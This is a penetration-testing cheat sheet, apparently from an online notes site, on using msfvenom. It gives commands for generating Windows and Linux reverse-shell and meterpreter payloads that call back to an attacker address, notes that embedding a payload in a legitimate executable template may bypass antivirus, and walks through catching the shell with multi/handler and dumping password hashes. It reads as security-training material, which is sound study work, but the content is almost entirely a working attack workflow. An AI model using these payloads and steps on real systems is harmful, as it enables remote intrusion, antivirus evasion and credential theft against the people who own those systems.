Msfvenom

Metasploit Unleashed | MSFvenomwww.offsec.com

General syntax

$ msfvenom --payload <payload> --format <format> --platform <platform> --arch <architecture> LHOST=<ATTACKER_ADDR> LPORT=<ATTACKER_LISTEN_PORT> --output <output_file>

# short form options
$ msfvenom -p <payload> -f <format> --platform <platform> -a <architecture> LHOST=<ATTACKER_ADDR> LPORT=<ATTACKER_LISTEN_PORT> -o <output_file>

$ msfvenom -h

List available options for module type

$ msfvenom -l payloads
$ msfvenom -l encoders
$ msfvenom -l nops
$ msfvenom -l all

Payload option

$ msfvenom -p ...

# eg. 
$ msfvenom -p linux/x86/shell_reverse_tcp

General payload naming convention

<OS>/<architecture>/<payload>

OS: Operating system

windows, linux

Architecture: x64 or x86

x86 (32-bit) by default, if not specified

Payload: reverse_tcp, bind_tcp, etc.

Common payloads

32-bit variant

windows/shell/reverse_tcp
windows/shell_reverse_tcp

64-bit variant

windows/x64/shell/reverse_tcp | linux/x64/shell/reverse_tcp
windows/x64/shell_reverse_tcp | linux/x64/shell_reverse_tcp
windows/x64/meterpreter/reverse_tcp | linux/x64/meterpreter/reverse_tcp
windows/x64/meterpreter_reverse_tcp | linux/x64/meterpreter_reverse_tcp

Format option

$ msfvenom -f ...

# eg.
$ msfvenom -f elf
$ msfvenom -f exe

Note: The output from msfvenom provides the shellcode (typically raw machine code) that can be executed on the target architecture, and is defined by the -p flag. The -f flag simply specifies the format for which the shellcode should be in.

Eg. Powershell

[Byte[]] $buf = 0xfc,0x48,0x83,...

Eg. C

unsigned char buf[] = "\xfc\x48\x83...

Eg. Python

buf = b""

buf += b"\xfc\x48\x8

buf += b"\...

Template

$ msfvenom -x ...
$ msfvenom --template ...

can be used to specify a custom executable file to be used as template
this means that the original functionality of the provided executable file will be fulfilled, but with the addition of the payload specified by an attacker
may bypass AV, etc.

CMD

$ msfvenom -p <payload> CMD="xxxx" -f <format> -o <output_file>.exe

Eg. Generate an x64 Windows .exe payload that executes a certain powershell.exe command (CMD option)

$ msfvenom -p windows/x64/exec CMD="powershell.exe ..." -f exe -o <output_file>.exe

Example

linux/x86/meterpreter/reverse_tcp

$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.xxx.xxx LPORT=8000 -f elf > shell.elf

Module to use on the attacking machine to catch a shell

exploit/multi/handler

msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost xxx.xxx.xxx.xxx
msf6 exploit(multi/handler) > set lport xxxx
msf6 exploit(multi/handler) > run

Run the shellcode on the target machine

# eg.
$ sudo ./shell.elf

Gain meterpreter shell on the attacker machine

meterpreter >

Using post exploitation hash dump module

meterpreter > background
msf6 exploit(multi/handler) > sessions -l 

Active sessions
===============

  Id  Name  Type                  Information            Connection
  --  ----  ----                  -----------            ----------
  1         meterpreter x86/linux  ...                    ...

msf6 exploit(multi/handler) > use post/linux/gather/hashdump
msf6 post(linux/gather/hashdump) > show options
msf6 post(linux/gather/hashdump) > set session 1
msf6 post(linux/gather/hashdump) > run
...

Metasploit Unleashed | MSFvenomwww.offsec.com

PreviousMeterpreter NextMisconfigurations

Last updated 1 month ago

hashtagGeneral syntax

hashtagHelp menu

hashtagList available options for module type

hashtagPayload option

hashtagGeneral payload naming convention

hashtagCommon payloads

hashtagFormat option

hashtagTemplate

hashtagCMD

hashtagExample

hashtagModule to use on the attacking machine to catch a shell

hashtagRun the shellcode on the target machine

hashtagGain meterpreter shell on the attacker machine

hashtagUsing post exploitation hash dump module